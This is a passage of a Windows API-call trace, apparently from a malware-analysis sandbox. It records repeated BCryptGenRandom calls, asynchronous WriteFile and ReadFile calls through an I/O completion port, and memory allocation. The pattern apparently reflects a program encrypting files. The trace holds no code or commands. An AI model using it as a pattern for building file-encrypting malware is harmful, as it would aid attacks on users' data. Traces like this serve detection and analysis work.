lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0190.320] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0190.328] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0190.330] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0190.336] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.337] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0190.338] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.338] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0190.338] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0190.338] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0190.339] free (_Block=0x3e305b8) [0190.339] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0190.339] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0190.339] free (_Block=0x1fa91d0) [0190.339] free (_Block=0x1fa2ed8) [0190.339] free (_Block=0x1fa90b8) [0190.339] WriteFile (in: hFile=0x330, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0190.340] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0190.346] WriteFile (in: hFile=0x330, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x132c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0190.347] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0190.354] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.354] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0190.355] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.355] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0190.355] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0190.355] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0190.355] free (_Block=0x3e305b8) [0190.355] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0190.355] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0190.356] free (_Block=0x1fa91d0) [0190.356] free (_Block=0x1fa2ed8) [0190.356] free (_Block=0x1fa90b8) [0190.356] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0190.360] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0190.371] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.372] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.372] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0190.372] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.372] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.372] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0190.372] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0190.372] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0190.373] free (_Block=0x3e305b8) [0190.373] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0190.373] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0190.373] free (_Block=0x1fa91d0) [0190.373] free (_Block=0x1fa2ed8) [0190.373] free (_Block=0x1fa90b8) [0190.373] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0190.379] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0190.651] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.749] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.749] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0190.749] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.750] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.750] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0190.752] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0190.752] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0190.752] free (_Block=0x3e305b8) [0190.753] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0190.753] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0190.753] free (_Block=0x1fa91d0) [0190.753] free (_Block=0x1fa2ed8) [0190.753] free (_Block=0x1fa90b8) [0190.753] WriteFile (in: hFile=0x330, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0190.756] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0190.757] CloseHandle (hObject=0x170) returned 1 [0190.757] free (_Block=0x3df0008) [0190.757] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0191.594] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3a0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0191.595] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0192.014] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.015] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0192.015] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.016] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.016] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0192.016] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0192.017] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0192.017] free (_Block=0x3e305b8) [0192.017] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0192.017] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0192.017] free (_Block=0x1fa91d0) [0192.017] free (_Block=0x1fa2ed8) [0192.017] free (_Block=0x1fa90b8) [0192.017] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0192.019] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0192.043] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.044] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0192.044] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.045] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0192.046] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0192.046] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0192.046] free (_Block=0x3e305b8) [0192.046] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0192.046] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0192.046] free (_Block=0x1fa91d0) [0192.046] free (_Block=0x1fa2ed8) [0192.046] free (_Block=0x1fa90b8) [0192.047] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0192.049] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0192.062] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.063] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0192.063] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.063] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0192.064] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0192.064] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0192.064] free (_Block=0x3e305b8) [0192.064] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0192.064] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0192.064] free (_Block=0x1fa91d0) [0192.064] free (_Block=0x1fa2ed8) [0192.064] free (_Block=0x1fa90b8) [0192.064] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0192.065] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0192.074] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.075] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0192.075] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.075] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0192.076] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0192.077] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0192.077] free (_Block=0x3e305b8) [0192.077] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0192.077] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0192.077] free (_Block=0x1fa91d0) [0192.077] free (_Block=0x1fa2ed8) [0192.078] free (_Block=0x1fa90b8) [0192.078] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0192.080] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0192.089] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.090] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0192.090] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.090] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0192.091] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0192.091] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0192.091] free (_Block=0x3e305b8) [0192.091] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0192.091] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0192.091] free (_Block=0x1fa91d0) [0192.091] free (_Block=0x1fa2ed8) [0192.091] free (_Block=0x1fa90b8) [0192.091] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0192.093] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0192.101] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.102] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0192.102] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.102] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0192.102] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0192.102] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0192.102] free (_Block=0x3e305b8) [0192.102] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0192.102] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0192.103] free (_Block=0x1fa91d0) [0192.103] free (_Block=0x1fa2ed8) [0192.103] free (_Block=0x1fa90b8) [0192.103] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0192.104] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0192.112] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.113] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0192.113] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.113] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0192.113] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0192.113] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0192.113] free (_Block=0x3e305b8) [0192.113] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0192.113] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0192.114] free (_Block=0x1fa91d0) [0192.114] free (_Block=0x1fa2ed8) [0192.114] free (_Block=0x1fa90b8) [0192.114] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0192.116] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0192.121] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.122] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0192.122] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.122] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0192.122] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0192.122] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0192.122] free (_Block=0x3e305b8) [0192.122] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0192.122] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0192.123] free (_Block=0x1fa91d0) [0192.123] free (_Block=0x1fa2ed8) [0192.123] free (_Block=0x1fa90b8) [0192.123] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0192.124] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0192.137] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.137] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0192.138] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.138] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0192.138] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0192.138] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0192.138] free (_Block=0x3e305b8) [0192.138] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0192.138] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0192.139] free (_Block=0x1fa91d0) [0192.139] free (_Block=0x1fa2ed8) [0192.139] free (_Block=0x1fa90b8) [0192.139] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0192.139] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0192.145] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.146] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0192.146] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.146] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0192.146] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0192.146] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0192.146] free (_Block=0x3e305b8) [0192.146] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0192.146] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0192.147] free (_Block=0x1fa91d0) [0192.147] free (_Block=0x1fa2ed8) [0192.147] free (_Block=0x1fa90b8) [0192.147] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0192.147] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0192.160] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.160] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0192.160] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.161] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.161] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0192.161] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0192.161] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0192.161] free (_Block=0x3e305b8) [0192.161] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0192.161] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0192.161] free (_Block=0x1fa91d0) [0192.161] free (_Block=0x1fa2ed8) [0192.162] free (_Block=0x1fa90b8) [0192.162] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61e, 